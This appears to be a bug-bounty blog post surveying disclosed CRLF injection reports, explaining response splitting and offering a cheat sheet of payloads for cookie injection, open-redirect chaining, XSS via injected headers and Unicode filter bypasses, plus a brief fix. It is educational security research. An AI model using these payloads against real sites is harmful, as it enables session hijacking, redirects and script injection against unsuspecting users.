CRLF Injection Playbook

Aditya Soni
Jan 12 · 4 min read

Hello Guys,
Just a Rough analysis of bugs Disclosed Publicly about CRLF injection

This analysis is done just because of curiosity about learning new things and tho I found this topic interesting. So Thought of sharing about it with you guys.
I started with Reading about disclosed reports about CRLF injection on Hackerone Hacktivity. (Some interesting reports will be discussed below)

Getting Started

Now, What is CRLF?

Line feed = \n (%0a)
Carriage Return = \r (%0d)

Basically, Pressing Enter key is the combination of carriage return & line feed

Windows Editor mostly uses a combination of \r\n
Unix uses mostly \n

Diggin’ into Injection and Attack Vector

What is CRLF Injection?

A Carriage Return Line Feed (CRLF) Injection vulnerability occurs when an application does not sanitize user input correctly and allows for the insertion of carriage returns and line feeds, input which for many internet protocols, including HTML, denote line breaks and have special significance.
For example, Parsing of HTTP message relies on CRLF characters (%0D%0A which decoded represent \r\n) to identify sections of HTTP messages, including headers.
Reference:

The Effect of CRLF injection also includes HTTP Request smuggling and HTTP Response Splitting. ( Detailing about them is out of the scope of this Blog, Maybe will discuss it in next blog post)


Starting The Research

I started with Hackerone Hacktivity and Searched for CRLF injection which gave me 59 Results “Only

That doesn’t conclude that there are only 59 publicly disclosed reports on CRLF injection
Then I asked my Best friend (GOOGLE) about CRLF injection reports. It gave me 80 Results about CRLF

And after some time my browser was filled with CRLF Injection reports

And in all the reports above I found that CRLF injection is most commonly done by modifying an HTTP parameter or URL.

Going through All the Reports and Write-ups I created a cheat sheet for CRLF injection which is as follows:

CHEATSHEET

1. HTTP Response Splitting
• /%0D%0ASet-Cookie:mycookie=myvalue
2. CRLF chained with Open Redirect
• //www.google.com/%2F%2E%2E%0D%0AHeader-Test:test2 • /www.google.com/%2E%2E%2F%0D%0AHeader-Test:test2 • /google.com/%2F..%0D%0AHeader-Test:test2
• /%0d%0aLocation:%20http://example.com
3. CRLF Injection to XSS
• /%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23
• /%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
4. Filter Bypass
• %E5%98%8A = %0A = \u560a
• %E5%98%8D = %0D = \u560d
• %E5%98%BE = %3E = \u563e (>)
• %E5%98%BC = %3C = \u563c (<)
• Payload = %E5%98%8A%E5%98%8DSet-Cookie:%20test

Result And Analysis

Most of the CRLF injection can lead to XSS and Open Redirects if chained properly which increases the Criticality of the report and you can escalate your report to Medium CVS score easily

Mitigation or Fix Implementation

A simple solution for CRLF Injection is to sanitize the CRLF characters before passing into the header or to encode the data which will prevent the CRLF sequences from entering the header.

This was all about the Attack vector and Research about CRLF injection. Now let’s see some payloads available publicly and Discuss some Interesting Report.


Payloads

Interesting Reports

1. Twitter HTTP Response Splitting

In 2015 April, filedescriptor reported this vulnerability to twitter which allowed hackers to set an arbitrary cookie by tacking on additional information to an HTTP request.
He was able to pass in %E5%98%8A%E5%98%8DSet-Cookie:%20test which resulted in %0A and %0D being included in the cookie header and enabled him to receive SetCookie: test back from Twitter.

Conclusion:
When you are looking for vulnerabilities, always remember to think outside the box and submit encoded values to see how the site handles the input.

2. HTTP Response Splitting (CRLF injection) due to headers overflow

To know in detail about this report, filedescriptor himself has published a blog

3. v.shopify.com Response Splitting


THE END

During this process, I definitely learned new things and now I feel like I have much more knowledge than before about CRLF injection and have a good intuition of finding some new vulnerability.

So, Until Next Blog

Best of luck everyone. Keep-Hacking!

Feedbacks and edits are welcome

Twitter, Linkedin

If you enjoyed this blog, please click the 👏 button and share it to help others find it.

You are under survillence.

Aditya Soni

Written by

Cyber Verse
Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade